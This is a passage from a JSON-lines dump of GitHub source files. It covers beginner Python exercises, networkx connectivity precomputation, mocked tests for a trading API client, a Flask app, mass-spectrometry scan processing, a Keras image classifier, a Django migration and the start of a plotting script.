at the last in list\nnumber = [1, 2, 3]\nnumber.append(4)\nnumber.remove(2)\nprint(number)\n\n\n# adding value in some index list\ndata = [1, 3, 4]\ntemp = data[:]\nprint(temp)\ntemp[1:1] = [2]\nprint(temp)\n\n\n# calling key in json list\njson ={\n \"sudent\": \"aziz\",\n \"class\": \"kelas-i\"\n}\n\ntemp = []\n\nfor k,v in json.items():\n temp.append(k)\n\nprint(temp[1])\n","repo_name":"aziz-alqudsy/basic-python","sub_path":"lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37937754462","text":"import networkx as nx\nimport json\nimport os\n\ndef main():\n done = ['dfn_58.graphml', 'colt_153.graphml', 'gts_ce_149.graphml', 'intellifiber_73.graphml', 'triangle.graphml']\n networks = ['abilene_11.graphml']\n\n for net_file in networks:\n node_connectivity = {}\n edge_connectivity = {}\n graphml_network = nx.read_graphml(net_file, node_type=int)\n for u in graphml_network.nodes():\n u_id = f'pop{u}'\n node_connectivity[u_id] = {}\n edge_connectivity[u_id] = {}\n for v in graphml_network.nodes():\n v_id = f'pop{v}'\n if u_id != v_id:\n node_connectivity[u_id][v_id] = nx.node_connectivity(graphml_network, s=u, t=v)\n edge_connectivity[u_id][v_id] = nx.edge_connectivity(graphml_network, s=u, t=v)\n\n os.makedirs('connectivity/', exist_ok=True)\n with open(f'connectivity/{net_file}_node_con.json', 'w') as fp:\n json.dump(node_connectivity, fp)\n with open(f'connectivity/{net_file}_edge_con.json', 'w') as fp:\n json.dump(edge_connectivity, fp)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"CN-UPB/distributed-coordination","sub_path":"params/networks/precompute.py","file_name":"precompute.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"12333966014","text":"from trading_ig.rest import IGService\nimport responses\nimport json\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport re\n\n\nclass TestActivities:\n\n \"\"\"\n unit tests for activities\n \"\"\"\n\n @responses.activate\n def test_activities_by_period(self):\n\n # test_activities_by_period\n\n with open('tests/data/activities_v1.json', 'r') as file:\n response_body = json.loads(file.read())\n\n responses.add(responses.GET,\n re.compile('https://demo-api.ig.com/gateway/deal/history/activity/.+'),\n match_querystring=False,\n headers={'CST': 'abc123', 'X-SECURITY-TOKEN': 'xyz987'},\n json=response_body,\n status=200)\n\n ig_service = IGService('username', 'password', 'api_key', 'DEMO')\n result = ig_service.fetch_account_activity_by_period(10000000)\n\n # we expect a pd.DataFrame with 17 columns and 3 rows\n assert isinstance(result, pd.DataFrame)\n assert result.shape[0] == 3\n assert result.shape[1] == 17\n\n @responses.activate\n def test_activities_by_date(self):\n\n # fetch_account_activity_by_date\n\n with open('tests/data/activities_v1.json', 'r') as file:\n response_body = json.loads(file.read())\n\n url = \"https://demo-api.ig.com/gateway/deal/\"\n date_pat = '[0-9]{2}-[0-9]{2}-[0-9]{4}' # NOT a very god regexp for dates will suffice here\n\n responses.add(responses.GET,\n re.compile(f\"{url}history/activity/{date_pat}/{date_pat}\"),\n match_querystring=False,\n headers={'CST': 'abc123', 'X-SECURITY-TOKEN': 'xyz987'},\n json=response_body,\n status=200)\n\n ig_service = IGService('username', 'password', 'api_key', 'DEMO')\n to_date = datetime.now()\n from_date = to_date - timedelta(days=7)\n result = ig_service.fetch_account_activity_by_date(from_date, to_date)\n\n # we expect a pd.DataFrame with 17 columns and 3 rows\n assert isinstance(result, pd.DataFrame)\n assert result.shape[0] == 3\n assert result.shape[1] == 17\n\n\n","repo_name":"ElijahAhianyo/ig-markets-api-python-library","sub_path":"tests/test_activities.py","file_name":"test_activities.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"70897780004","text":"from flask import Flask, render_template, request\nfrom listAssignments import convert\n\napp = Flask(__name__)\n\n@app.route('/')\ndef template():\n return render_template('index.html')\n\n@app.route('/', methods=['POST'])\ndef output():\n input = request.form['input']\n addons = request.form['addons']\n input = input.split('\\n')\n processed_text = convert(input, addons)\n processed_text = processed_text.split('\\n')\n return render_template('index.html', text=processed_text)","repo_name":"joliefish/list-assignments","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11093738832","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport warnings\nimport operator\nimport collections\nfrom typing import Sequence\nimport networkx as nx\nimport numpy as np\nimport h5py\nfrom dimspy.portals import mzml_portal\nfrom dimspy.portals import hdf5_portal\nfrom dimspy.portals import thermo_raw_portal\nfrom dimspy.process.replicate_processing import average_replicate_scans\nfrom dimspy.models.peaklist import PeakList\nfrom dimspy.process.peak_filters import filter_attr\nfrom dimspy.process.peak_filters import filter_ringing\nfrom dimspy.process.peak_filters import filter_mz_ranges\nfrom .filters import validate_injection_time_ms1, filter_by_replicates, filter_by_isolation\n\n\ndef hdf5_peaklists_to_txt(filename: str, path_out: str, delimiter:str = \"\\t\"):\n\n \"\"\"\n\n :param filename:\n :param path_out:\n :param delimiter:\n \"\"\"\n\n if not os.path.isfile(filename):\n raise IOError('HDF5 database [%s] does not exist' % filename)\n if not h5py.is_hdf5(filename):\n raise IOError('input file [%s] is not a valid HDF5 database' % filename)\n\n if not os.path.isdir(path_out):\n raise IOError(\"File or Directory does not exist:\".format(path_out))\n\n obj = hdf5_portal.load_peaklists_from_hdf5(filename)\n if \"#\" in obj[0].ID:\n fns = set([pl.ID.split(\"#\")[0] for pl in obj])\n sub_ids = [pl.ID.split(\"#\")[1] for pl in obj]\n for fn in fns:\n with open(os.path.join(path_out, os.path.splitext(fn)[0] + \".txt\"), \"w\") as pk_out:\n for i, pl in enumerate(obj):\n if fn in pl.ID:\n pl.add_attribute(\"event\", pl.full_shape[0] * [sub_ids[i]], flagged_only=False, on_index=3)\n str_out = pl.to_str(delimiter=delimiter)\n if i > 0:\n pk_out.write(str_out[str_out.index('\\n'):])\n else:\n pk_out.write(str_out)\n pl.drop_attribute(\"event\")\n else:\n for pl in obj:\n with open(os.path.join(path_out, os.path.splitext(pl.ID)[0] + \".txt\"), \"w\") as pk_out:\n pk_out.write(pl.to_str(delimiter=delimiter))\n return\n\n\ndef mz_tolerance(mz: float, tol: float, unit: str = \"ppm\"):\n\n \"\"\"\n\n :param mz: mz value\n :param tol: tolerance\n :param unit: ppm or da\n :return:\n :rtype: float\n \"\"\"\n\n if unit.lower() == \"ppm\":\n return mz * (1 - (float(tol) * 0.000001)), mz * (1 + (float(tol) * 0.000001))\n elif unit.lower() == \"da\":\n return mz - float(tol), mz + float(tol)\n else:\n raise ValueError(\"Incorrect unit type (options: ppm or da)\")\n\n\ndef create_graphs_from_scan_ids(scan_dependents: list, scan_events: dict, ion_injection_times: dict):\n\n \"\"\"\n Create Directed Graph from scan dependent relationships\n\n :param scan_dependents:\n :param scan_events:\n :param ion_injection_times:\n :return:\n :rtype:\n \"\"\"\n\n graphs = []\n G = nx.OrderedDiGraph()\n G.add_edges_from(sorted(list(scan_dependents), key=operator.itemgetter(0, 1)))\n for subgraph in [G.subgraph(c) for c in nx.weakly_connected_components(G)]:\n\n edges = sorted(list(subgraph.edges()), key=operator.itemgetter(0, 1))\n nodes = sorted(subgraph.nodes())\n\n replicates_within, its = collections.OrderedDict(), collections.OrderedDict()\n for n in nodes:\n replicates_within.setdefault(scan_events[n], []).append(n)\n its.setdefault(scan_events[n], []).append(ion_injection_times[n])\n\n G = nx.OrderedDiGraph()\n for rw in replicates_within:\n\n scan_info = [(None, None, 0.0)]\n scan_info.extend(re.findall(r'([\\w\\.-]+)@([a-zA-Z]+)(\\d+\\.\\d+)', rw))\n\n G.add_node(rw,\n scanids=replicates_within[rw],\n mslevel=len(scan_info),\n coltype=scan_info[-1][1],\n colenergy=float(scan_info[-1][2]),\n injectiontimes=its[rw],\n flag=True)\n G.add_edges_from([(scan_events[e[0]], scan_events[e[1]]) for e in edges])\n graphs.append(G)\n\n return graphs\n\n\ndef merge_ms1_scans(graphs: list):\n\n \"\"\"\n\n :param graphs:\n :return:\n :rtype:\n \"\"\"\n\n scan_ids = collections.OrderedDict()\n for G in graphs:\n root = list(nx.topological_sort(G))[0]\n scan_ids.setdefault(root, []).extend(G.node[root][\"scanids\"])\n for G in graphs:\n root = list(nx.topological_sort(G))[0]\n G.node[root][\"scanids\"] = scan_ids[root]\n return graphs\n\n\ndef create_templates(graphs: list, nh: int):\n\n \"\"\"\n Create a 'master' graph that include all the experimental trees\n Loop through all the subgraphs/graphs\n\n :param graphs:\n :param nh:\n :return:\n :rtype:\n \"\"\"\n\n templates = []\n for G in graphs:\n # Validate if the root node represents a scan event without fragmentation\n # Check if a subgraph, with a user defined number of nodes, exist in the list of templates\n # The nodes (scan events) are matched based on the order they have been collected\n if list(G.edges())[0:nh - 1] not in [list(g.edges())[0:nh - 1] for g in templates]:\n # Create a initial template with a particular number of nodes / edges\n Gt = nx.OrderedDiGraph()\n Gt.add_edges_from(list(G.edges())[0:nh - 1])\n for n in Gt.nodes():\n scan_info = re.findall(r'([\\w\\.-]+)@([a-zA-Z]+)(\\d+\\.\\d+)', n)\n Gt.node[n][\"scanids\"] = list()\n Gt.node[n][\"mslevel\"] = len(scan_info) + 1\n if len(scan_info) == 0:\n Gt.node[n][\"coltype\"] = None\n Gt.node[n][\"colenergy\"] = None\n else:\n Gt.node[n][\"coltype\"] = scan_info[-1][1]\n Gt.node[n][\"colenergy\"] = float(scan_info[-1][2])\n Gt.node[n][\"template\"] = True\n Gt.node[n][\"flag\"] = True\n templates.append(Gt)\n return templates\n\n\ndef group_by_template(graphs: list, templates: list):\n\n \"\"\"\n\n :param graphs:\n :param templates:\n :return:\n :rtype:\n \"\"\"\n\n master_graphs = [G.copy() for G in templates]\n for G in graphs:\n for Gt in templates:\n if G.subgraph(Gt.nodes()).number_of_edges() == Gt.number_of_edges() and \\\n sorted(G.subgraph(Gt.nodes()).nodes()) == sorted(Gt.nodes()):\n\n i = templates.index(Gt)\n\n for e in G.edges():\n for j in range(0, 2):\n # update master_graphs add nodes/edges or update scanids\n if e[j] not in master_graphs[i].nodes():\n master_graphs[i].add_node(e[j],\n scanids=G.node[e[j]][\"scanids\"],\n mslevel=G.node[e[j]][\"mslevel\"],\n coltype=G.node[e[j]][\"coltype\"],\n colenergy=G.node[e[j]][\"colenergy\"],\n flag=G.node[e[j]][\"flag\"],\n template=False)\n else:\n for scan_id in G.node[e[j]][\"scanids\"]:\n if scan_id not in master_graphs[i].node[e[j]][\"scanids\"]:\n master_graphs[i].node[e[j]][\"scanids\"].append(scan_id)\n\n if e not in master_graphs[i].edges():\n master_graphs[i].add_edge(e[0], e[1])\n\n return master_graphs\n\n\ndef assign_precursor(peaklist: PeakList, header_frag: str, tolerance: float = 0.5):\n\n \"\"\"\n\n\n :param peaklist:\n :param header_frag:\n :param tolerance:\n :return:\n :rtype:\n \"\"\"\n\n prec_at_energy = re.findall(r'([\\w\\.-]+)@([\\w\\.-]+)', header_frag)\n subset = []\n for i, mz in enumerate(peaklist.mz):\n if mz >= float(prec_at_energy[-1][0]) - tolerance and mz <= float(prec_at_energy[-1][0]) + tolerance:\n subset.append((mz, peaklist.intensity[i]))\n\n if len(subset) > 0:\n s = sorted(subset, key=lambda x: x[1])[-1]\n return s[0], s[1]\n else:\n return None, None\n\n\ndef group_scans(filename: str, nh: int = 2, min_replicates: int = 1, report: str = None,\n max_injection_time: float = None, merge_ms1: bool = False, split: bool = False, remove: bool = True):\n\n \"\"\"\n\n :param filename:\n :param nh:\n :param min_replicates:\n :param report:\n :param max_injection_time:\n :param merge_ms1:\n :param split:\n :param remove:\n :return:\n \"\"\"\n\n if filename.lower().endswith(\".mzml\"):\n d = mzml_portal.Mzml(filename)\n elif filename.lower().endswith(\".raw\"):\n d = thermo_raw_portal.ThermoRaw(filename)\n else:\n raise IOError(\"Incorrect file format: {}\".format(os.path.basename(filename)))\n\n si = d.scan_ids()\n sd = d.scan_dependents()\n sit = d.ion_injection_times()\n\n graphs = create_graphs_from_scan_ids(sd, si, sit)\n\n for G in list(graphs):\n h = list(nx.topological_sort(G))[0]\n if G.node[h][\"mslevel\"] > 1:\n warnings.warn(\"MS1 scan missing. The following scans ids have been removed: {}\".format([G.node[n][\"scanids\"] for n in G.nodes()]))\n graphs.remove(G)\n\n if max_injection_time:\n for G in list(graphs):\n if not validate_injection_time_ms1(G, max_injection_time):\n scan_id_ms1 = G.nodes[list(nx.topological_sort(G))[0]][\"scanids\"]\n warnings.warn(\"Injection time MS1 {} > Maximum injection time for MS1. The following scan ids have been removed: {}\".format(scan_id_ms1, [G.node[n][\"scanids\"] for n in G.nodes()]))\n graphs.remove(G)\n\n if not split:\n templates = create_templates(graphs, nh)\n groups = group_by_template(graphs, templates)\n else:\n groups = graphs\n for G in groups: nx.set_node_attributes(G, False, 'template')\n\n for i, G in enumerate(groups):\n G.graph['id'] = i + 1\n\n if merge_ms1:\n # Merge all MS1 scans across a run/sample\n groups = merge_ms1_scans(groups)\n\n # flag attribute set to False if not pass filter\n groups = [filter_by_replicates(G, min_replicates) for G in groups]\n groups = [filter_by_isolation(G) for G in groups]\n\n if report is not None:\n\n with open(report, \"w\") as out:\n out.write(\"tree_id\\tevent\\ttemplate\\tscan_ids\\tscans\\tflag\\n\")\n\n for G in groups:\n if report is not None:\n for n in G.nodes(data=True):\n out.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(G.graph['id'],\n n[0],\n int(n[1][\"template\"]),\n n[1][\"scanids\"],\n len(n[1][\"scanids\"]),\n int(n[1][\"flag\"])))\n\n if remove:\n for G in list(groups):\n h = list(nx.topological_sort(G))[0]\n if not G.node[h][\"flag\"]:\n groups.remove(G)\n continue\n\n for n in G.nodes(data=True):\n if not n[1][\"flag\"]:\n G.remove_node(n[0])\n else:\n del n[1]['flag']\n\n if len(groups) == 0:\n warnings.warn(\"No scan events remaining after filtering. Remove MS data file or alter parameters.\")\n\n return groups\n\n\ndef process_scans(filename: str, groups: list, function_noise: str, snr_thres: float, ppm: float,\n min_fraction: float = None, rsd_thres: float = None, normalise: bool = False,\n ringing_thres: float = None, exclusion_list: dict = {}, report: str = None,\n block_size: int = 5000, ncpus: int = None):\n\n \"\"\"\n\n :param filename:\n :param groups:\n :param function_noise:\n :param snr_thres:\n :param ppm:\n :param min_fraction:\n :param rsd_thres:\n :param normalise:\n :param ringing_thres:\n :param exclusion_list:\n :param report:\n :param block_size: number of peaks in each clustering block.\n :param ncpus: number of CPUs for parallel clustering. Default = None, indicating using as many as possible\n :return: List of (average) PeakList objects (DIMSpy)\n :rtype: Sequence[PeakList]\n \"\"\"\n\n print()\n print(os.path.basename(filename))\n\n if filename.lower().endswith(\".mzml\"):\n run = mzml_portal.Mzml(filename)\n elif filename.lower().endswith(\".raw\"):\n run = thermo_raw_portal.ThermoRaw(filename)\n else:\n raise IOError(\"Incorrect file format: {}\".format(os.path.basename(filename)))\n\n mz_ranges = []\n if exclusion_list is not None and len(exclusion_list) > 0:\n mz_ranges = [mz_tolerance(mz, ppm) for mz in exclusion_list]\n\n if normalise:\n rsd_on_attr = \"intensity_norm\"\n rsd_label = \"rsd_intensity_norm\"\n else:\n rsd_on_attr = \"intensity\"\n rsd_label = \"rsd\"\n\n if report is not None:\n out = open(report, \"w\")\n out.write(\"tree_id\\tevent\\tscans\\tpeaks\\tmedian_{}\\n\".format(rsd_label))\n\n # Check for MS1 scans with the same scan_ids (grouped) to avoid redundant processing\n ms1_headers, temp_scan_ids = collections.OrderedDict(), []\n for G in groups:\n n = list(G.nodes(data=True))[0]\n if temp_scan_ids.count(n[1][\"scanids\"]) > 1 and n[0] not in ms1_headers:\n ms1_headers[n[0]] = None\n temp_scan_ids.append(n[1][\"scanids\"])\n\n pls_avg = []\n\n for G in groups:\n nodes = G.nodes(data=True)\n print(\"Processing scans....\")\n print(\"\\n\".join(map(str, [n[0] for n in nodes])))\n print()\n for n in nodes:\n pls_scans = [run.peaklist(scan_id, function_noise=function_noise) for scan_id in n[1][\"scanids\"]]\n # Check for MS1 scan available with the same scan_ids (grouped) to avoid redundant processing\n if n[0] in ms1_headers and ms1_headers[n[0]] is not None:\n copy_ms1 = ms1_headers[n[0]].copy()\n # update id\n copy_ms1.ID = \"{}#{}:{}\".format(os.path.basename(filename), G.graph['id'], n[0])\n pls_avg.append(copy_ms1)\n nscans, n_peaks, median_rsd = len(pls_scans), copy_ms1.shape[0], np.nanmedian(copy_ms1.get_attribute(rsd_label))\n else:\n if ringing_thres is not None and float(ringing_thres) > 0.0:\n #print \"Removing ringing artifacts.....\"\n pls_scans = [filter_ringing(pl, threshold=ringing_thres, bin_size=1.0) if len(pl.mz) > 0 else pl for pl in pls_scans]\n\n pls_scans = [filter_attr(pl, \"snr\", min_threshold=snr_thres) if len(pl.mz) > 0 else pl for pl in pls_scans]\n\n if normalise:\n # print \"Normalise by Total Ion Current (TIC).....\"\n pls_scans = [pl.add_attribute(\"intensity_norm\", pl.get_attribute(\"intensity\", False) / pl.metadata[\"tic\"], flagged_only=False, on_index=2) if len(pl.mz) > 0 else pl for pl in pls_scans]\n\n #print \"Aligning, averaging and filtering peaks.....\"\n nscans, n_peaks, median_rsd = len(pls_scans), 0, \"NA\"\n\n if sum(pl.shape[0] for pl in pls_scans) == 0:\n warnings.warn(\"No scan data available for {}\".format(n[0]))\n else:\n if len(pls_scans) == 1:\n pl_avg = average_replicate_scans(\"{}#{}:{}\".format(os.path.basename(filename), G.graph['id'], n[0]), pls_scans, ppm, min_fraction, None, rsd_on_attr, block_size, ncpus)\n if rsd_on_attr != \"intensity\":\n pl_avg.add_attribute(\"rsd_{}_flag\".format(rsd_on_attr), np.ones(pl_avg.full_size), flagged_only=False, is_flag=True)\n else:\n pl_avg.add_attribute(\"rsd_flag\", np.ones(pl_avg.full_size), flagged_only=False, is_flag=True)\n else:\n pl_avg = average_replicate_scans(\"{}#{}:{}\".format(os.path.basename(filename), G.graph['id'], n[0]), pls_scans, ppm, min_fraction, rsd_thres, rsd_on_attr, block_size, ncpus)\n\n if exclusion_list is not None and len(exclusion_list) > 0:\n pl_avg = filter_mz_ranges(pl_avg, mz_ranges, flag_name=\"exclusion_flag\", flagged_only=False)\n\n # add to full_scans to avoid redundant processing\n if n[0] in ms1_headers and ms1_headers[n[0]] is None:\n ms1_headers[n[0]] = pl_avg.copy()\n\n pls_avg.append(pl_avg)\n n_peaks, median_rsd = pl_avg.shape[0], np.nanmedian(pl_avg.get_attribute(rsd_label))\n\n if report is not None:\n out.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(groups.index(G) + 1, n[0], nscans, n_peaks, median_rsd))\n\n if len(pls_avg) == 0:\n raise IOError(\"No peaks remaining after filtering. Remove file from Study (filelist).\")\n\n if report is not None:\n out.close()\n\n return pls_avg\n\n\ndef create_spectral_trees(trees: Sequence[nx.OrderedDiGraph], peaklists: Sequence[PeakList]):\n\n \"\"\"\n\n :param trees: list of NetworkX graphs\n :param peaklists: list of PeakList objects\n :return:\n :rtype: Sequence[nx.OrderedDiGraph]\n \"\"\"\n\n spectral_trees = []\n\n headers = [pl.ID.split(\"#\")[1] for pl in peaklists]\n\n for i, G in enumerate(trees):\n GG = nx.OrderedDiGraph()\n GG.graph[\"id\"] = G.graph[\"id\"]\n for edge in list(G.edges(data=True)):\n\n header_prec = \"{}:{}\".format(G.graph[\"id\"], edge[0])\n if len(G.node[edge[0]][\"scanids\"]) == 0 or header_prec not in headers:\n if \" ms \" in header_prec:\n warnings.warn(\"Cannot create a spectral tree without precursor from {}\".format(header_prec))\n break\n continue\n\n pl = peaklists[headers.index(header_prec)]\n mz_prec, intensity_prec = assign_precursor(pl, edge[1], tolerance=0.5)\n\n if not mz_prec:\n if \" ms \" in header_prec:\n warnings.warn(\"Cannot create a spectral tree without precursor from {}\".format(header_prec))\n break\n continue\n else:\n mz_id_prec = \"{}_{}_{}\".format(round(mz_prec, 4), headers.index(header_prec), np.where(pl.mz == mz_prec)[0][0])\n GG.add_node(mz_id_prec, mz=mz_prec, intensity=intensity_prec, header=header_prec.split(\":\")[1], mslevel=G.node[edge[0]][\"mslevel\"], precursor=True)\n\n header_frag = \"{}:{}\".format(G.graph[\"id\"], edge[1])\n if len(G.node[edge[1]][\"scanids\"]) == 0 or header_frag not in headers:\n continue\n\n pl_fragments = peaklists[headers.index(\"{}:{}\".format(G.graph[\"id\"], edge[1]))]\n for j, mz_frag in enumerate(pl_fragments.mz):\n mz_id_frag = \"{}_{}_{}\".format(round(mz_frag, 4), headers.index(header_frag), j)\n GG.add_node(mz_id_frag, mz=mz_frag, intensity=pl_fragments.intensity[j], header=header_frag.split(\":\")[1], mslevel=G.node[edge[1]][\"mslevel\"], precursor=False)\n GG.add_edge(mz_id_prec, mz_id_frag, mzdiff=round(mz_prec - mz_frag, 7), type=\"e\")\n\n for node in nx.isolates(GG):\n GG.remove_node(node)\n\n spectral_trees.append(GG)\n return spectral_trees\n","repo_name":"computational-metabolomics/msnpy","sub_path":"msnpy/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":19784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21957543330","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nimport os\nimport matplotlib.pyplot as plt\ndef read_data():\n for file_name in os.listdir('./images/images'):\n print(file_name)\n\n image_size = (180, 180)\n batch_size = 64\n train_ds, val_ds = tf.keras.utils.image_dataset_from_directory(\n \"./images/images\",\n validation_split=0.2,\n subset=\"both\",\n seed=42,\n image_size=image_size,\n batch_size=batch_size,\n labels='inferred',\n label_mode = 'int'\n )\n\n # plt.figure(figsize=(10, 10))\n # for images, labels in train_ds.take(1):\n # for i in range(9):\n # ax = plt.subplot(3, 3, i + 1)\n # plt.imshow(images[i].numpy().astype(\"uint8\"))\n # plt.title(int(labels[i]))\n # plt.axis(\"off\")\n return train_ds, val_ds\n\n\ndef data_processing(ds):\n data_augmentation = keras.Sequential(\n [\n layers.RandomFlip(\"horizontal\"),\n layers.RandomRotation(0.3),\n ]\n )\n\n ds = ds.map(\n lambda img, label: (data_augmentation(img), label),\n num_parallel_calls=tf.data.AUTOTUNE,\n )\n ds = ds.prefetch(tf.data.AUTOTUNE)\n return ds\ndef build_model(input_shape, num_classes):\n inputs = keras.Input(shape=input_shape)\n\n # Entry block\n x = layers.Rescaling(scale=1./127.5, offset=-1)(inputs)\n x = layers.Conv2D(128, 3, strides=2, padding=\"same\")(x)\n x = layers.BatchNormalization()(x)\n x = layers.Activation(\"relu\")(x)\n\n previous_block_activation = x # Set aside residual\n\n for size in [256, 512, 768]:\n x = layers.Activation(\"relu\")(x)\n x = layers.SeparableConv2D(size, 3, padding=\"same\")(x)\n x = layers.BatchNormalization()(x)\n\n x = layers.Activation(\"relu\")(x)\n x = layers.SeparableConv2D(size, 3, padding=\"same\")(x)\n x = layers.BatchNormalization()(x)\n\n x = layers.MaxPooling2D(3, strides=2, padding=\"same\")(x)\n\n # Project residual\n residual = layers.Conv2D(size, 1, strides=2, padding=\"same\")(\n previous_block_activation\n )\n x = layers.add([x, residual]) # Add back residual\n previous_block_activation = x # Set aside next residual\n\n x = layers.SeparableConv2D(1024, 3, padding=\"same\")(x)\n x = layers.BatchNormalization()(x)\n x = layers.Activation(\"relu\")(x)\n\n x = layers.GlobalAveragePooling2D()(x)\n if num_classes == 2:\n activation = \"sigmoid\"\n units = 1\n else:\n activation = \"softmax\"\n units = num_classes\n\n x = layers.Dropout(0.5)(x)\n outputs = layers.Dense(units, activation=activation)(x)\n model = keras.Model(inputs, outputs)\n\n # keras.utils.plot_model(model, show_shapes=True)\n return model\n\ndef train_model(model, train_ds, val_ds):\n epochs = 100\n\n callbacks = [\n keras.callbacks.ModelCheckpoint(\"save_at_{epoch}.keras\"),\n ]\n model.compile(\n optimizer=keras.optimizers.Adam(1e-3),\n loss='SparseCategoricalCrossentropy',\n metrics=[\"accuracy\"],\n )\n model.fit(\n train_ds,\n epochs=epochs,\n callbacks=callbacks,\n validation_data=val_ds,\n )\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n train_ds, val_ds = read_data()\n train_ds = data_processing(train_ds)\n # val_ds = val_ds\n model = build_model((180, 180)+(3,), 5)\n train_model(model, train_ds, val_ds)\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"peiningzhang/CS4341_2023Fall","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23429252910","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport ckeditor.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0008_siteconfiguration'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='siteconfiguration',\n name='homepage_content',\n field=ckeditor.fields.RichTextField(help_text=\"Contenu de la page d'accueil\", verbose_name=\"Page d'accueil\"),\n ),\n migrations.AlterField(\n model_name='siteconfiguration',\n name='news_count',\n field=models.IntegerField(help_text='Nombre de news dans la liste des news', verbose_name='Actualités', default=9),\n ),\n migrations.AlterField(\n model_name='siteconfiguration',\n name='site_title',\n field=models.CharField(help_text=\"Titre du site (dans l'onglet du navigateur)\", max_length=255, verbose_name='Titre du site', default='Site title'),\n ),\n ]\n","repo_name":"agripo/website","sub_path":"core/migrations/0009_auto_20150821_1910.py","file_name":"0009_auto_20150821_1910.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19227836060","text":"#to find average of odd and even numbers seperately\n\nn=int(input(\"enter number of numbers\"))\nlist=[]\neven=[]\nodd=[]\n\nfor i in range (n):\n num = int(input(\"enter a number\"))\n list.append(num)\n\n if num%2==0:\n even.append(num)\n else:\n odd.append(num)\n\nprint(list)\nprint(even)\nprint(odd)\n\nsumeven=0\nsumodd=0\nfor i in range(len(even)):\n sumeven=sumeven + even[i]\n\nfor i in range(len(odd)):\n sumodd=sumodd + odd[i]\n\navgeven=sumeven/len(even) \navgodd=sumodd/len(odd)\n\nprint(\"average of entered even numbers is\",avgeven)\nprint(\"average of entered odd numbers is\",avgodd)\n","repo_name":"anishmanchanda/average-of-odd-and-even-seperately-in-sublist","sub_path":"average odd even seperately list.py","file_name":"average odd even seperately list.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26556663050","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nfrom matplotlib.colors import Normalize\nfrom matplotlib.colors import LinearSegmentedColormap\nimport matplotlib as mpolib\n\n\n\n# from txt files make pathways dico (admits mixed genes and metabolites by pathway),\n# same gene/met can be shared by two or more pathways, this is ok\npathways_files = ['pathway1.txt', 'pathTWO.txt']\npathdico = dict()\nfor fi in pathways_files:\n tmp = pd.read_csv(fi, header=None)\n path_name = fi.replace(\".txt\", \"\")\n pathdico[path_name] = tmp[0].to_list()\n\nprint(pathdico) # {'pathway1': ['GENE1', 'GENE2', ... 'metabo1', 'metabo2' ...], ...}\n\ndimensions_pdf = (14,10)\n# comparisons in yaml file : provide each comparison 'title', followed by [DEG table , DAM table ]\ncomparisondico = {'fake1' : ['genesfake.tsv' ,'metabosfake.tsv'],\n 'rigolo' : ['genesrigolo.tsv' ,'metabosrigolo.tsv'],}\n\n\nDEG_full = pd.DataFrame({'name': [], 'log2FC': []})\nDAM_full = pd.DataFrame({'name': [], 'log2FC': []})\n\nprint('\\nVerifying input data for metabologram')\nfor comparison in comparisondico.keys():\n print(\"\")\n DEGtable = comparisondico[comparison][0]\n DAMtable = comparisondico[comparison][1]\n print('comparison : ', comparison)\n print('DEG table :', DEGtable)\n print('DAM table :', DAMtable)\n genesdf = pd.read_csv(DEGtable, sep='\\t')\n metsdf = pd.read_csv(DAMtable, sep='\\t')\n metsdf = metsdf[['mets', 'log2FC']]\n metsdf.columns = ['name', 'log2FC']\n genesdf.columns = ['name', 'log2FC']\n metsdf = metsdf.assign(comparison = comparison, typemol = \"metabolite\")\n genesdf = genesdf.assign(comparison = comparison, typemol = \"gene\")\n DEG_full = pd.concat([DEG_full, genesdf], axis = 0)\n DAM_full = pd.concat([DAM_full, metsdf], axis = 0)\n\nprint(DEG_full)\nprint(DAM_full)\n\n\n###################################################### color functions\n\n\ndef get_custom_color_palette_hash(lowcol, midcol, highcol):\n \"\"\"\n courtesy from :\n https://richardhildebrand.wordpress.com/2019/09/18/create-a-custom-color-palette-with-matplotlib-and-seaborn/\n \"\"\"\n colorlist = [lowcol, midcol, highcol]\n return LinearSegmentedColormap.from_list(\"\", colorlist, N=256)\n\nmycmap = get_custom_color_palette_hash('#0070C0', 'white', '#D30000')\n\n# max absolute value both genes and metabo\nmabs = max(abs(DAM_full['log2FC']))\ngabs = max(abs(DEG_full['log2FC']))\n\n\ndef rgbas2hex(rgbas_):\n colorsout = []\n for tup in rgbas_:\n tmp = mpolib.colors.to_hex(tup)\n colorsout.append(tmp)\n return colorsout\n\n\n\ndef 